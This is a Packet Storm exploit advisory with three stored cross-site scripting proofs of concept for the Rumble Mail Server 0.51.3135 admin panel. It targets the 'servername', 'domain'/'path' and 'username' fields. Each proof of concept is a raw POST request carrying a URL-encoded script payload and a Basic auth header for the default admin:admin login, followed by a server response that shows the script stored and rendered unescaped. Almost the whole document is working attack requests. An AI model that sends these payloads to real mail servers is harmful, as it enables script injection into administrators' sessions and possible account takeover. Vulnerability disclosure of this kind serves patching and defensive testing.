Rumble Mail Server 0.51.3135 Cross Site Scripting

2020-12-14T00:00:00
ID PACKETSTORM:160476
Type packetstorm
Reporter Mohammed Alshehri
Modified 2020-12-14T00:00:00

Description

                                        
                                            `# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS  
# Date: 2020-9-3  
# Exploit Author: Mohammed Alshehri  
# Vendor Homepage: http://rumble.sf.net/  
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe  
# Version: Version 0.51.3135  
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763  
  
# Exploit:  
POST /settings:save HTTP/1.1  
Host: 127.0.0.1:2580  
Connection: keep-alive  
Content-Length: 343  
Cache-Control: max-age=0  
Authorization: Basic YWRtaW46YWRtaW4=  
Upgrade-Insecure-Requests: 1  
Origin: http://127.0.0.1:2580  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://127.0.0.1:2580/settings  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
  
save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings  
HTTP/1.1 302 Moved  
Location: /settings:save  
  
HTTP/1.1 200 OK  
Connection: close  
Content-Type: text/html  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<link rel="shortcut icon" href="/favicon.ico " />  
<title>RumbleLua</title>  
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />  
</head>  
<body>  
<div class="header_top">  
<div class="header_stuff">  
RumbleLua on <script>alert(xss.com)</script><br />  
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />  
</span>  
  
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>  
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>  
  
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>  
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>  
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>  
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>  
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>  
  
</div>  
</div>  
<div id="contents">  
<h1>Server settings</h1>  
  
Saving config/rumble.conf  
</div>  
<br />  
<p align="center">  
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]  
</p>  
</body>  
  
  
</html>  
  
  
-----  
  
# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS  
# Date: 2020-9-3  
# Exploit Author: Mohammed Alshehri  
# Vendor Homepage: http://rumble.sf.net/  
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe  
# Version: Version 0.51.3135  
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763  
  
# Info  
The parameters `domain` and `path` are vulnerable to stored XSS.  
  
# Exploit:  
POST /domains HTTP/1.1  
Host: 127.0.0.1:2580  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 119  
Origin: http://127.0.0.1:2580  
Authorization: Basic YWRtaW46YWRtaW4=  
Connection: keep-alive  
Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(  
Upgrade-Insecure-Requests: 1  
  
domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true  
HTTP/1.1 200 OK  
Connection: close  
Content-Type: text/html  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<link rel="shortcut icon" href="/favicon.ico " />  
<title>RumbleLua</title>  
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />  
</head>  
<body>  
<div class="header_top">  
<div class="header_stuff">  
RumbleLua on a<br />  
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />  
</span>  
  
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>  
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>  
  
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>  
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>  
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>  
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>  
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>  
  
</div>  
</div>  
<div id="contents">  
<h2>Domains</h2>  
<p>  
<table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td> <form action="/domains" method="post" id='create'>  
<div>  
<div >  
<div class='form_key'>  
Domain name:  
</div>  
<div class='form_value'>  
<input type="text" name="domain"/>  
</div>  
</div>  
  
<div>  
<div class='form_key'>  
Optional alt. storage path:  
</div>  
<div class='form_value'>  
<input type="text" name="path"/>  
</div>  
</div>  
  
  
<div class='form_el' id='domainsave' >  
<div class='form_key'>  
<input type="hidden" name="create" value="true"/>  
<input class="button" type="submit" value="Save domain"/>  
<input class="button" type="reset" value="Reset"/>  
</div>  
</div>  
<br/><br/><br/><br/><br />  
</div>  
</form>  
</td></tr></table></p>  
<p> </p>  
<table class="elements" border='0' cellpadding='5' cellspacing='1'>  
<tr><th>Domain</th><th>Actions</th></tr>  
<tr><td><img src='/icons/house.png' align='absmiddle'/> <a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a> <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>  
</div>  
<br />  
<p align="center">  
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]  
</p>  
</body>  
  
  
</html>  
  
-----  
# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS  
# Date: 2020-9-3  
# Exploit Author: Mohammed Alshehri  
# Vendor Homepage: http://rumble.sf.net/  
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe  
# Version: Version 0.51.3135  
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763  
  
# Exploit:  
POST /users HTTP/1.1  
Host: 127.0.0.1:2580  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 96  
Origin: http://127.0.0.1:2580  
Authorization: Basic YWRtaW46YWRtaW4=  
Connection: keep-alive  
Referer: http://127.0.0.1:2580/users  
Upgrade-Insecure-Requests: 1  
  
username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit  
HTTP/1.1 200 OK  
Connection: close  
Content-Type: text/html  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<link rel="shortcut icon" href="/favicon.ico " />  
<title>RumbleLua</title>  
<link href="rumblelua2.css" rel="stylesheet" type="text/css" />  
</head>  
<body>  
<div class="header_top">  
<div class="header_stuff">  
RumbleLua on a.com<br />  
<span class="fineprint">Rumble Mail Server v/0.51.3135 <br />  
</span>  
  
<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>  
<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>  
  
<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>  
<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>  
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>  
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>  
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>  
  
</div>  
</div>  
<div id="contents">  
  
  
<h1>RumbleLua users </h1>  
<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />  
Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />  
while regular users can only  
see and edit the domains they have access to.  
</p>  
<table class="elements">  
<tr>  
<th>Create a new user:</th>  
</tr>  
<tr>  
<td>  
<form action="/users" method="post" name="makeuser">  
  
<div style="width: 300px; text-align:right; float: left;">  
<label for="username"><strong>Username:</strong></label>  
<input name="username" autocomplete="off" type="text" id="username" >  
<br>  
<label for="password"><strong>Password:</strong></label>  
<input type="password" autocomplete="off" name="password" id="password">  
<br />  
<label for="password"><strong>Access rights:</strong></label>  
<select name="rights" size="4" style="width: 150px;" multiple="multiple">  
<option value="*" style="color:#C33; font-weight:bold;">Full control</option>  
<optgroup label="Domains:">  
</optgroup>  
</select>  
</div>  
<p><br /><br />  
<br />  
<br />  
<br />  
<br />  
<br />  
<br />  
<br />  
<br />  
  
    
<input type="submit" name="submit" id="submit" value="Submit" />  
</p>  
  
</form>  
</td>  
</tr>  
</table>  
<table width="200" class="elements">  
<tr>  
<th>Username</th>  
<th>Rights</th>  
<th>Actions</th>  
</tr>  
<tr>  
<td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'><script>alert("M507")</script></font></strong></td>  
<td>Full control</td>  
<td>  
<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>   
<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>  
</td>  
</tr>  
<tr>  
<td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'>admin</font></strong></td>  
<td>Full control</td>  
<td>  
<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>   
<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>  
</td>  
</tr>  
<tr>  
<td><img src="/icons/action_lock.png" align="absmiddle"/> <strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>  
<td>Full control</td>  
<td>  
<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>   
<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>  
</td>  
</tr>  
</table>  
<p> </p>  
  
  
</div>  
<br />  
<p align="center">  
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]  
</p>  
</body>  
  
  
</html>  
  
`